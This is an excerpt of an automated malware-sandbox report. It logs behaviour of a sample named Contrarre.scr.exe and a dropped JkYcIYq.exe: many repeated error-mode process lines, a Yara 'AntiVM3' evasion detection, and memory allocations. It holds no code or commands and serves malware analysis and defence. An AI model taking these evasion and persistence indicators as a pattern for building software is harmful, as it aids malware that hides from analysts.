Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Contrarre.scr.exe PID: 7392, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: JkYcIYq.exe PID: 7840, type: MEMORYSTR

Source: C:\Users\user\Desktop\Contrarre.scr.exe	Memory allocated: 17F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Memory allocated: 3330000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Memory allocated: 3140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Memory allocated: 5870000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Memory allocated: 6870000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Memory allocated: 69A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Memory allocated: 79A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Memory allocated: B8C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Memory allocated: C8C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Memory allocated: CD50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Memory allocated: DD50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Memory allocated: EF60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Memory allocated: FF60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Memory allocated: 10F60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Memory allocated: 1460000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Memory allocated: 2E20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Contrarre.scr.exe	Memory allocated: 14D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Memory allocated: 2580000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Memory allocated: 27B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JkYcIYq.exe	Memory allocated: 2580000 memory reserve \| memory write watch	Jump to behavior
